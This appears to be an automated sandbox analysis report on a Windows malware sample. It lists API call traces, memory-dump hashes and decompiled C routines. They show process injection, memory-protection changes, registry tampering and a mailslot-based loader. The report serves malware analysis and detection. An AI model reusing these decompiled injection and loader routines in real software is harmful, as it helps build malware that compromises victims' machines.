  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 146
  • API ID: RegCloseKeyRegQueryValueExlstrcpy$CreateDirectoryHeapFreeRegOpenKey$RegCreateKeyRegDeleteValueRegOpenKeyExRtlAllocateHeapStrChrlstrcmpilstrlen
  • String ID: (
  • API String ID: 3095632906-3887548279
  • Opcode ID: 94967647f14b4038a7c87927226b8276d3bfedb75998008a5caceb4601cf75e0
  • Instruction ID: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
  • Opcode Fuzzy Hash: 73318B4607CED746D12B5C8204727A7A295EFE2F44DACF33974217D6990F603B2A5B84
  • Instruction Fuzzy Hash: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
APIs
  • StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
  • lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
  • RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
  • lstrlenW.KERNEL32 ref: 01B32ECC
  • RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
  • lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
  • HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B3464F: lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
    • Part of subcall function 01B3464F: lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
    • Part of subcall function 01B3464F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
    • Part of subcall function 01B3464F: wsprintfW.USER32 ref: 01B3469A
    • Part of subcall function 01B34172: lstrlenW.KERNEL32(01B32F7A,01B342EB,00000000,?,?,01B32F7A,00000000), ref: 01B3417B
    • Part of subcall function 01B34172: memcpy.NTDLL(00000000,01B32F7A,00000000,00000000,01B342ED,?,?,01B32F7A,00000000), ref: 01B341A5
    • Part of subcall function 01B34172: memset.NTDLL ref: 01B341B9
  • lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
    • Part of subcall function 01B32B25: SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
    • Part of subcall function 01B32B25: CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
    • Part of subcall function 01B32B25: FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
  • lstrcpy.KERNEL32(?,?), ref: 01B32FEE
  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
  • RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
  • RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
  • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
  • RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
  • RegCloseKey.ADVAPI32(?), ref: 01B330BA
  • RegCloseKey.ADVAPI32(?), ref: 01B330C3
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
  • RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
